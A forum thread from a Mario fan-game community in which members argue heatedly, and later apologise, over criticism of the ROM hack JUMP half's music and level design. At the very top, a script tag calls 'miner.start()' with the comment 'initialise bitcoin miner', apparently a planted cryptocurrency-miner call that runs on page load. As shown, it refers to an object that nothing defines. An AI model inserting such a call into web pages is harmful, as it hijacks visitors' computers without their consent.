<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmbx community

JUMP ½ - Half a jump is still a jump

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

Leet wrote: They were just saying what songs they liked and didn't like because it was the topic of conversation, jesus christ yelsey. They weren't challenging your post whatsoever

Also if you made something of course youre going to talk about why the choices made were made, that's not "defensive" it's "having intent behind your choices"
All right, maybe I did get carried away. But every time I make a criticism about the (over)use of default music, the reaction is *always* the same: "I love that song!" As though that just completely shuts down criticism. Well, maybe not all of us *do*. Or at least, we don't want to hear it, again, *for three to five stages in a row*.

Also, frankly, I'm just fed up at the dismissal of complaints/criticisms and weak defenses of everything in this hack as "being intentional". All right. So that changes what you did to "something I didn't like... that you did on purpose". Which changes things..............how? Seriously. Do people *really* think I'm so stupid that I believe these design decisions happened by accident?

Ashan wrote:
YelseyKing wrote:
gbreeze wrote: most of the songs I find okay
Every one of your posts is so highly defensive of every little thing people find wrong -- your visions were all so meaningful and perfect and we're all just a bunch of whinebabies for challenging your "artistic masterpiece".
Now *there* was a spectacularly useless post. *applause*
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

Really sounds like this is on you for reading it this way. Sometimes people just want to voice their opinion about whatever the fuck came up and it isn't motivated out of silencing you - not that it would matter, because criticism is also not immune from criticism

Also, yes artists are going to tell you why they made the choices they made. That's called "reflecting on the creative process". It's not supposed to "change things" because nobody has any obligation to "change things" for you or anyone.

If an explanation and insight as to why their opinion is different from yours isn't satisfactory, what is? What kind of response are you looking for? Unconditional agreement? None at all?
Last edited by Leet on 07 Jun 2019, 04:26, edited 1 time in total.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

Leet wrote: Also, yes artists are going to tell you why they made the choices they made. That's called "reflecting on the creative process". It's not supposed to "change things" because nobody has any obligation to "change things" for you or anyone.
So basically, you're telling me there was an "artistic vision" behind using the default Athletic theme for a third of the game's stages? Well, I suppose it does thematically work, as nearly every stage that's used it has felt like uninspired filler, so hey.

Leet wrote: If an explanation and insight as to why their opinion is different from yours isn't satisfactory, what is? What kind of response are you looking for? Unconditional agreement? None at all?
What would I like? At least some kind of acknowledgement about how, you know, maybe we *do* have a point, even if they're adamantly against it for whatever reason. I don't criticize things because I'm a horrible person who wants to take people down a peg. I criticize things because, shockingly, I *like* them; I *care* about them, and I find it unfortunate that there's these little fixable flaws that muck things up. No, they're not obligated to change anything just because one person doesn't like them, but I find the whole "it's intentional" defense insulting on a personal level, because it, as I said, comes across as people thinking I'm too stupid to realize that; that I thought it happened by accident somehow. No. I don't believe *anything* (short of glitches) happened "accidentally" in the design of this hack, or indeed, *any* game. But there's absolutely nothing wrong with being flexible, and admitting to yourself, "yeah, maybe this worked better in my head than it does in practice".
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
ano0maly
Discord User
Posts: 1827
Joined: 8 years ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby ano0maly » 5 months ago

Drama'd Up Mario Party

guess what that shortens to
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

You just said right now that everyone tells you their choices were intentional.

If you think "art" implies some "higher" meaning to what I'm saying, it doesn't - I'm not going to split hairs about creative works. I'm not saying that with a positive connotation. But I'm basing this entirely off of what you said. You didn't like gbreeze's post, which was talking about why the music choices ended up the way they are. That's an artist talking about their decisions.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

YelseyKing wrote: What would I like? At least some kind of acknowledgement about how, you know, maybe we *do* have a point
What if they don't think you have a point? I expect people to not be rude about it, but anybody can (and does) criticize anything. There is absolutely no obligation on anyone's part to find "a point" in all criticism, just as there is absolutely no obligation on anyone's part to find "a point" in all works that they are criticizing.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

Leet wrote: What if they don't think you have a point?
Then that's just them being closed-minded and arrogant, frankly. If you don't want to listen to feedback, don't release your creative works.

Also, there's a huge difference between saying "All right, I can kinda see where you're coming from, but..." and just outright dismissing it. If you *can't* see where someone is coming from, and *don't* believe they're making a valid point, I'm sorry, but that rubs me the wrong way.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1353
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby KobaBeach » 5 months ago

i know this is ironic coming from me who literally got banned for getting into a beef with morsel but let's all just relax and discuss this like adults and realize that no one was trying to dismiss the other's opinions nor is anyone trying to shit on jumphalf

and let's also keep ourselves from fanning the flames just for haha epic lulz gamers xddddd like in the last page

YelseyKing wrote: What would I like? At least some kind of acknowledgement about how, you know, maybe we *do* have a point, even if they're adamantly against it for whatever reason. I don't criticize things because I'm a horrible person who wants to take people down a peg. I criticize things because, shockingly, I *like* them; I *care* about them, and I find it unfortunate that there's these little fixable flaws that muck things up.
yk i think you're misunderstanding this

gbreeze put a "Personally," in front of everything else to say that it's merely their opinion. they're not saying you don't have a point or that your opinion doesn't matter. i can understand having issue with how things are worded like, i'm in the spectrum too and that's just A Thing I Do (tm), so i hope i can make you understand that you're probably just reading things wrong

it's okay you doof :catplanet:
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

YelseyKing wrote:
Leet wrote: What if they don't think you have a point?
Then that's just them being closed-minded and arrogant, frankly. If you don't want to listen to feedback, don't release your creative works.

Also, there's a huge difference between saying "All right, I can kinda see where you're coming from, but..." and just outright dismissing it. If you *can't* see where someone is coming from, and *don't* believe they're making a valid point, I'm sorry, but that rubs me the wrong way.
Creative works are made to be creative, not to be appealing. (Not so relevant in the context of a gameplay-focused mario romhack, but still.) If you really think nobody should share anything unless they're interested in Objectively Improving their Skills... that sounds a bit elitist to me!
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

Leet wrote:
YelseyKing wrote:
Leet wrote: What if they don't think you have a point?
Then that's just them being closed-minded and arrogant, frankly. If you don't want to listen to feedback, don't release your creative works.

Also, there's a huge difference between saying "All right, I can kinda see where you're coming from, but..." and just outright dismissing it. If you *can't* see where someone is coming from, and *don't* believe they're making a valid point, I'm sorry, but that rubs me the wrong way.
Creative works are made to be creative, not to be appealing. (Not so relevant in the context of a gameplay-focused mario romhack, but still.) If you really think nobody should share anything unless they're interested in Objectively Improving their Skills... that sounds a bit elitist to me!
I have no problem with "do it for yourself". Hell, I do that a lot. But once something has been released, it no longer just belongs to "the creator", and flippantly dismissing everyone's complaints makes it look like you don't really care what anyone thinks. Which is, again, *fine*, but then you sort of, at least in my eyes, forfeit the right to get on the defensive.

Also, if you're not interested in improving, then why even bother in the first place? Learning and improving should just be a *given* anywhere in life, frankly.

And I want to make it clear: I am *not* shitting on Jumphalf, or anyone involved in it. I absolutely *love* the hack; it's hands down *the* best SMW hack I've ever played, and it's so much better than the competition that it's not funny. But that doesn't mean I think it couldn't be *even better* with a few changes. It's just that the JUMP team seems to be so incredibly defensive and inflexible about it, that I'm finding it *very* frustrating.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

Where you're coming from is partially lost on me, since I don't see "personally, these are my opinions on the SMW music" as being defensive or inflexible at all. Or any other post. And there's been a lot of talk about levels that were cut or heavily changed in development. I know this sounds patronizing, but I really, really think this is you misreading other people.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

Leet wrote: I know this sounds patronizing, but I really, really think this is you misreading other people.
I wholly acknowledge that may very well be the case. I do have a bad tendency to misread/misinterpret what people say, and then respond inappropriately (or, rather, in my mind, it's the appropriate response, but since I misinterpreted it, to everyone *else*, it's the wrong direction). It's a personal flaw I'm well aware I have, and in that regard, I do apologize for being out of line.

That said, I do feel like you also rather missed the point of what I was trying to say, as well. Which is that -- and I apologize if I didn't make this clearer -- I don't like my criticisms being completely dismissed. No, they're not obligated to cave to my demands, and I'm not arrogant enough to believe anyone *should*. But at least an *acknowledgement* of them; a "I guess I see where you're coming from, but I did it this way because..." response that shows you're at least *paying attention* to what people are saying, is infinitely preferrable to what I'm just reading as a brush-off.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Ryrir
Posts: 474
Joined: 6 years ago
Pronouns: he/him/his
Location: Switzerland

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Ryrir » 5 months ago

YelseyKing wrote: Every one of your posts is so highly defensive of every little thing people find wrong -- your visions were all so meaningful and perfect and we're all just a bunch of whinebabies for challenging your "artistic masterpiece".
That was extremely uncalled for and just plain rude.

Look at gbreeze‘s posts again, he starts every single one of them with „In my opinion...“, „Personally...“, „This is not supposed to be a defense of the hack, more of an explanation of why we did things a certain way.“

If you want to tell us your opinions without anyone challenging them at all, you‘re at the wrong place on a forum like this.
this is getting laundromatic

User avatar
ano0maly
Discord User
Posts: 1827
Joined: 8 years ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby ano0maly » 5 months ago

Well tbf Yelsey didn't actually say that - that's how Ashan interpreted and paraphrased the situation.
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

ano0maly wrote: Well tbf Yelsey didn't actually say that - that's how Ashan interpreted and paraphrased the situation.
Uh, no? Ashan just directly quoted Yelsey, didn't you read his post
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
ano0maly
Discord User
Posts: 1827
Joined: 8 years ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby ano0maly » 5 months ago

Oh, I didn't notice because it seemed so trimmed up that I thought that was Ashan's summary of the two quoted posts.
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
polaris
Posts: 8
Joined: 6 months ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby polaris » 5 months ago

Honestly I don't think creators should be obligated to acknowledge criticism in the first place?

User avatar
Pyro
cutest girl 2023
Posts: 884
Joined: 4 years ago
Pronouns: she/her
Contact:

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Pyro » 5 months ago

Wild how Yelsey has continually been starting shit for days on end and yet keeps affirming that “oh I still like this hack don’t worry”. Go ahead just insult gbreeze like that, oh look he blanked out his goddamn account probably because of you acting like a fucking clown.

Just fuck off yelsey. Stop posting in this thread. No one cares that you think the athletic theme was used too much or whatever, you are literally just nitpicking every god damn minor thing. You’re entitled to your opinion but no one has to listen to it or bow down to whatever logic you have. I’m not tolerating this anymore especially when your posts are getting outright malicious.
Image
Image
Image
Image
Image

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

Ryrir wrote:
YelseyKing wrote: Every one of your posts is so highly defensive of every little thing people find wrong -- your visions were all so meaningful and perfect and we're all just a bunch of whinebabies for challenging your "artistic masterpiece".
That was extremely uncalled for and just plain rude.
Yes, I was wrong, I spoke in anger, I misinterpreted what he said, and incorrectly responded to what I *thought* he was saying, and I am sorry.
Ryrir wrote: If you want to tell us your opinions without anyone challenging them at all, you‘re at the wrong place on a forum like this.
If anything, this thread has taught me just how far apart I am from everyone else on this forum in terms of what I consider good/bad design. I've had very few people, if any, *agreeing* with me, after all. But what can I say? It gets frustrating to me when I feel like I'm just getting brushed off.
Pyro wrote: Wild how Yelsey has continually been starting shit for days on end and yet keeps affirming that “oh I still like this hack don’t worry”. Go ahead just insult gbreeze like that, oh look he blanked out his goddamn account probably because of you acting like a fucking clown.

Just fuck off yelsey. Stop posting in this thread. No one cares that you think the athletic theme was used too much or whatever, you are literally just nitpicking every god damn minor thing. You’re entitled to your opinion but no one has to listen to it or bow down to whatever logic you have. I’m not tolerating this anymore especially when your posts are getting outright malicious.
Whoooooaaa there. I admit I was out of line, but really? Other than one instance -- in which I *flat out admitted I was wrong* -- in which I went after gbreeze, I've tried to be as civil as I could.

Also, believe whatever you want; I *do* love Jumphalf, and while this will probably sound like I'm sucking up -- and I assure you, I am most certainly *not* -- I *especially* loved *your* levels. I'm *very* sorry that I misinterpreted the situation and acted like an ass, and I further apologize to everyone I hurt or offended, but I'm *not* sorry for having unpopular opinions, either.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2168
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby Leet » 5 months ago

Your opinion is valid to you by default; I don't think most people would post just to affirm someone of that because it wouldn't really contribute to wider discussion.

Like yes I agree it's probably a good thing to not have the same music track play over and over. Ok. I didn't feel the need to tell you I agreed because I thought it was obvious; I suspect most people who actually worked on the game would also agree. Nobody said anything because there was nothing more to be said.
Last edited by Leet on 07 Jun 2019, 06:03, edited 1 time in total.
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
MiracleWater
Posts: 27
Joined: 3 years ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby MiracleWater » 5 months ago

YelseyKing wrote: On one hand, you have a load of reset doors, which are kind enough to simply restart that current section, instead of dropping you at the start of the area; very nice. However, then you have the second half, which has a fair few instances where if you mess up, your only option is to die.
Ideally, the stage would have almost no reset doors and death would be the only option. However, I realized this would be too much for what JUMP half is about, and threw in a bunch of resets afterwards. If they seem inconsistently placed, this is most likely the reason why.
gbreeze wrote: I believe that JUMP 1/2's use of randomly using both custom and vanilla songs are simply a reference (or relic, if you would prefer to use that) of the original JUMP. Also, much like the main overworld uses vanilla colors, I think the vanilla songs are a matter of personal style at times.
Yea, basically this.
YelseyKing wrote: Also, frankly, I'm just fed up at the dismissal of complaints/criticisms and weak defenses of everything in this hack as "being intentional". All right. So that changes what you did to "something I didn't like... that you did on purpose". Which changes things..............how? Seriously. Do people *really* think I'm so stupid that I believe these design decisions happened by accident?
I can't speak for anyone else, but being the author of the level that had vanilla music, I can say that it was intentional. I get why someone might not enjoy listening to vanilla music for long play sessions, but it's not a universal opinion. If I had to make the level over again, I'd be absolutely fine using vanilla music.

User avatar
YelseyKing
Anyone want a banana? :3
Posts: 1307
Joined: 5 years ago
First name: Matt
Location: Oregon

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby YelseyKing » 5 months ago

MiracleWater wrote:
YelseyKing wrote: On one hand, you have a load of reset doors, which are kind enough to simply restart that current section, instead of dropping you at the start of the area; very nice. However, then you have the second half, which has a fair few instances where if you mess up, your only option is to die.
Ideally, the stage would have almost no reset doors and death would be the only option. However, I realized this would be too much for what JUMP half is about, and threw in a bunch of resets afterwards. If they seem inconsistently placed, this is most likely the reason why.
Hey, that's fair. Like I said, I liked the stage, I was just a bit confused at its inconsistency. Thanks for clearing that up.
MiracleWater wrote:
YelseyKing wrote: Also, frankly, I'm just fed up at the dismissal of complaints/criticisms and weak defenses of everything in this hack as "being intentional". All right. So that changes what you did to "something I didn't like... that you did on purpose". Which changes things..............how? Seriously. Do people *really* think I'm so stupid that I believe these design decisions happened by accident?
I can't speak for anyone else, but being the author of the level that had vanilla music, I can say that it was intentional. I get why someone might not enjoy listening to vanilla music for long play sessions, but it's not a universal opinion. If I had to make the level over again, I'd be absolutely fine using vanilla music.
And since you put it that way, it's a decision I can ultimately fully respect. I acknowledge it was a nitpick; I didn't expect nor want it to blow up like this. I've apologized several times, and I'll do it again: I'm sorry for the shit I stirred up.
Image
Ayjo and Meya are watching you. Be on your best behavior.

Moists:
Image

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

User avatar
tangy
owo
Posts: 662
Joined: 5 years ago
Pronouns: null
Location: Atlanta

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby tangy » 5 months ago

I think this game peaked at the blue switch
Image Avatar by me
Image
Image

User avatar
ano0maly
Discord User
Posts: 1827
Joined: 8 years ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby ano0maly » 5 months ago

Yeah um Pyro I can understand that you feel you've had enough of reading this, but when you first make a post again in over a year and it's this, I think it just escalates the situation further. Do we really need to respond to loud arguing with even louder yelling like this?

I really don't get why JUMPhalf discussion has become this much of a dumpster. I thought the quality of the hack and the experience has improved since the original JUMP????
Image The talkhaus Discord server. Come ask for an invite to join!

Image

Image
Now the sole biggest

User avatar
polaris
Posts: 8
Joined: 6 months ago

Re: JUMP ϕ(14)/ϕ(13) - Half a jump is still a jump

Postby polaris » 5 months ago

re: today's level, I also had the sense that the green coins that denoted where to jump weren't initially in the level but were added later as a difficulty adjustment, but was I right?

edit: not that I'm criticizing it or anything (although I guess pointing out a feeling of inconsistency in the level is implicitly a criticism) I just wanted to feel smart


Return to “let's play”

Who is online

Users browsing this forum: DinnerSonic, FPzero, moogy and 10 guests